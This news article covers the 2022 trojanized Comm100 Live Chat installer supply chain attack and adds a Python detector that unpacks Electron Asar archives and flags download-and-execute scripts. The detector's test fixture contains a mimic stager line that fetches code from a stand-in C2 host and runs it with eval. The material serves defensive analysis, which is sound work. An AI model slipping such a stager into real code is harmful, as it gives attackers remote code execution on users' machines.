3 October 2022

Popular commercial chat provider compromised to spread malware in supply chain attack

Suspected Chinese hackers have hijacked the installer for widely used software to distribute malware in what appears to be a supply chain attack similar to the SolarWinds compromise, a new report from cybersecurity firm CrowdStrike has revealed.

The attack targeted Vancouver-based customer service company Comm100, which provides chat services on websites and social media. The campaign deployed malware via a trojanized installer for the Comm100 Live Chat app that was signed with a valid Comm100 certificate dated September 26, 2022. Comm100’s website claims more than 15,000 customers in 51 countries.

The installer is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive. This backdoor downloads and executes a second-stage script, which gives the threat actor a remote shell through which additional malware can be installed.
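Because the backdoor sat in main.js inside the Electron app's Asar archive, a defender's first check on a suspect installer is to open that archive and look at its entrypoint. The Python below is an added illustration, not code from CrowdStrike's report or from Comm100: it parses the Asar layout (size pickle, JSON header pickle, raw file bytes), extracts every packed script, and flags any that combine a network fetch with a code-execution sink. The regex heuristics and the sample archive are constructed assumptions, not the real indicators.

```python
import json
import re
import struct

# Heuristic only (assumed, not CrowdStrike's indicators): network fetch plus exec sink.
NETWORK_RE = re.compile(r"\b(https?\.get|https?\.request|fetch|net\.connect)\s*\(")
EXEC_RE = re.compile(r"\b(eval|new Function|child_process|vm\.runInThisContext)\b")

def build_asar(files: dict[str, bytes]) -> bytes:
    """Build a minimal flat asar (constructed fixture): size pickle, header pickle, file bytes."""
    header, body = {"files": {}}, b""
    for name, data in files.items():
        header["files"][name] = {"size": len(data), "offset": str(len(body))}
        body += data
    raw = json.dumps(header).encode()
    padded = raw + b"\0" * (-len(raw) % 4)          # pickle strings are 4-byte aligned
    header_pickle = struct.pack("<II", 4 + len(padded), len(raw)) + padded
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + body

def read_asar(blob: bytes) -> dict[str, bytes]:
    """Return {path: bytes} for every packed entry, recursing into directories."""
    _, header_size, _, str_len = struct.unpack_from("<IIII", blob, 0)
    header = json.loads(blob[16:16 + str_len])       # JSON header follows two pickles
    data_start, out = 8 + header_size, {}           # file data follows the header pickle
    def walk(node: dict, prefix: str) -> None:
        for name, entry in node["files"].items():
            path = f"{prefix}/{name}" if prefix else name
            if "files" in entry:
                walk(entry, path)
            elif "offset" in entry:                  # "unpacked" entries carry no offset
                off = data_start + int(entry["offset"])
                out[path] = blob[off:off + entry["size"]]
    walk(header, "")
    return out

def flag_stagers(archive: dict[str, bytes]) -> list[str]:
    """List .js entries matching both heuristics; main.js is the Electron entrypoint."""
    hits = []
    for path, data in archive.items():
        src = data.decode("utf-8", "replace")
        if path.endswith(".js") and NETWORK_RE.search(src) and EXEC_RE.search(src):
            hits.append(path)
    return hits

# Constructed sample: a benign script beside a main.js that mimics the described
# behaviour (download a second stage, eval it). Not the real Comm100 payload.
BENIGN = b"const { app } = require('electron');\napp.whenReady().then(() => {});\n"
STAGER = (b"const https = require('https');\nhttps.get('https://c2.example.invalid/s.js',"
          b" r => { let b = ''; r.on('data', c => b += c); r.on('end', () => eval(b)); });\n")
SAMPLE = build_asar({"package.json": b'{"main":"main.js"}', "ui.js": BENIGN, "main.js": STAGER})
```

Running `flag_stagers(read_asar(SAMPLE))` on the constructed archive returns `['main.js']`; on a real installer, point `read_asar` at the bytes of `resources/app.asar` and treat a hit on the entrypoint as a reason to compare the package against a known-good build.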

According to CrowdStrike, the attack occurred from at least September 27, 2022 through the morning of September 29, 2022. Organizations affected include companies in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe. Although CrowdStrike did not reveal how many companies were hit, people familiar with the situation cited a dozen known victims.

The researchers believe that a Chinese threat actor was responsible for this attack based on several factors, such as the “presence of Chinese-language comments in the malware,” the use of Alibaba infrastructure to host C2 servers, and the use of tactics, techniques and procedures (TTPs) linked to previous attacks “targeting of online gambling entities in East and Southeast Asia,” an area that has long been of interest to Chinese hackers.
